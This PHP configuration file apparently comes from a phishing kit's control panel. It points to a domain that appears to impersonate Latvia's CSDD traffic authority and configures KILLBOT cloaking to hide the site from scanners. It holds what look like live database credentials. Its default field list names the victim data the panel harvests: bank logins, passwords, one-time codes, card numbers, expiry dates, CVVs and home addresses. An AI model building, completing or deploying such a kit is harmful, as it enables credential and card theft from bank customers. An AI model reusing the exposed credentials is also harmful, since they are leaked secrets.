<?php
// This is the URL where the panel is hosted
// -> simply copy and paste the domain linked to your hosting
// -> make sure the URL starts with https:// (SSL is required!)
// -> if there is a '/' on the end, please remove it!
define('URLROOT', 'https://csdd-latvija.com');

// Google reCAPTCHA Configuration
// This will show the user a captcha before being allowed access to the page
// -> to setup, visit https://www.google.com/recaptcha/admin/create and fill out the form
// -> MAKE SURE TO SELECT RECAPTCHA V2!
// -> once done, you will be shown a 'sitekey', please enter this below.
define('GOOGLE_RECAPTCHA', 0);
define('GOOGLE_SITEKEY', 'SITEKEY_HERE');

// KILLBOT API Key
define('KILLBOT_ENABLE', 0);
define('KILLBOT_KEY', 'KILLBOT_HERE');
define('KILLBOT_REDIRECT', 404);

// These are the credentials of the main SQL database
// -> make sure the details exactly match, failure will result in issues
define('SQL_USER_NAME', 'i687d2a175e3cc_i687d2a175e3cc');
define('SQL_USER_PASS', 'hG4Xpg4d1Eyf0Jd5@');
define('SQL_DATABASE_NAME', 'i687d2a175e3cc_i687d2a175e3cc');

// These are the default selected properties for the panels filtration system
// Recommended not to edit these
define("DEFAULT_SELECTED_PROPERTIES", array("bank", "login_type", "username", "password", "otp", "response", "cardnumber", "expirydate", "cvv", "name", "address", "city", "zipcode", "phonenumber"));
 ?>
